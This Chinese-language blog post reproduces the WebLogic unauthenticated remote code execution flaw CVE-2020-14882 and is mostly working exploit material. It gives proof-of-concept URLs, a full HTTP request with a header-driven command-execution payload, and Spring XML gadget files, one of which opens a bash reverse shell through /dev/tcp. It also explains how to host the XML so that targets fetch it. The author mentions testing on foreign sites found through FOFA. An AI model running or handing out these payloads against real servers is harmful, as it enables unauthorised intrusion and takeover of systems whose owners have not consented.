weblogic未授權命令執行(CVE-2020-14882)

前言

因為最近太忙了，各種文檔之類的亂七八糟的事，對於剛爆的weblogic未授權，fofa上找了幾個國外的站測了一下，正好今天沒什么事，打算寫個文章記錄一下

0x00 漏洞介紹 

未經身份驗證的遠程攻擊者可能通過構造特殊的 HTTP GET請求，利用該漏洞在受影響的 WebLogic Server 上執行任意代碼。

0x01 影響版本 

1. Oracle Weblogic Server 10.3.6.0.0

2. Oracle Weblogic Server 12.1.3.0.0

3. Oracle Weblogic Server 12.2.1.3.0

4. Oracle Weblogic Server 12.2.1.4.0

5. Oracle Weblogic Server 14.1.1.0.0

0x02 漏洞復現

weblogic 12

POC1

https://127.0.0.1//console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27ping *.dnslog.cn%27);%22)

 POC 2

GET /console/css/%252e%252e%2fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(%27weblogic.work.ExecuteThread%20currentThread%20=%20(weblogic.work.ExecuteThread)Thread.currentThread();%20weblogic.work.WorkAdapter%20adapter%20=%20currentThread.getCurrentWork();%20java.lang.reflect.Field%20field%20=%20adapter.getClass().getDeclaredField(%22connectionHandler%22);field.setAccessible(true);Object%20obj%20=%20field.get(adapter);weblogic.servlet.internal.ServletRequestImpl%20req%20=%20(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(%22getServletRequest%22).invoke(obj);%20String%20cmd%20=%20req.getHeader(%22cmd%22);String[]%20cmds%20=%20System.getProperty(%22os.name%22).toLowerCase().contains(%22window%22)%20?%20new%20String[]{%22cmd.exe%22,%20%22/c%22,%20cmd}%20:%20new%20String[]{%22/bin/sh%22,%20%22-c%22,%20cmd};if(cmd%20!=%20null%20){%20String%20result%20=%20new%20java.util.Scanner(new%20java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(%22\\A%22).next();%20weblogic.servlet.internal.ServletResponseImpl%20res%20=%20(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(%22getResponse%22).invoke(req);res.getServletOutputStream().writeStream(new%20weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();}%20currentThread.interrupt();%27) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
cmd:ifconfig
Cookie: AWSALB=2CByIuBvdBgQ+stqPAvW782/TmTWayNCOhDW/NFlLT/b9YTUn+XlyXuFbbmEHvBX0MSbFz0wjsktigX7wxciOFEo5mme3CGjxZ6UK/m4aAmamL+u7c3PfQcZ+TVn; AWSALBCORS=2CByIuBvdBgQ+stqPAvW782/TmTWayNCOhDW/NFlLT/b9YTUn+XlyXuFbbmEHvBX0MSbFz0wjsktigX7wxciOFEo5mme3CGjxZ6UK/m4aAmamL+u7c3PfQcZ+TVn
Connection: close

Weblogic 10 的版本

http://127.0.0.1/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://127.0.0.1/poc.xml)

Windows XML 

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>cmd</value>
        <value>/c</value>
        <value>whoami</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

Linux XML 

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>/bin/bash</value>
        <value>-cc</value>
        <value><![CDATA[bash -i >& /dev/tcp/127.0.0.1/8888 0>&1]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

用法就是將XML部署到公網服務器，或者被攻擊機器能訪問到的服務器也可以，然后訪問我們構造好的鏈接就行

0X03 修復建議

去官網更新補丁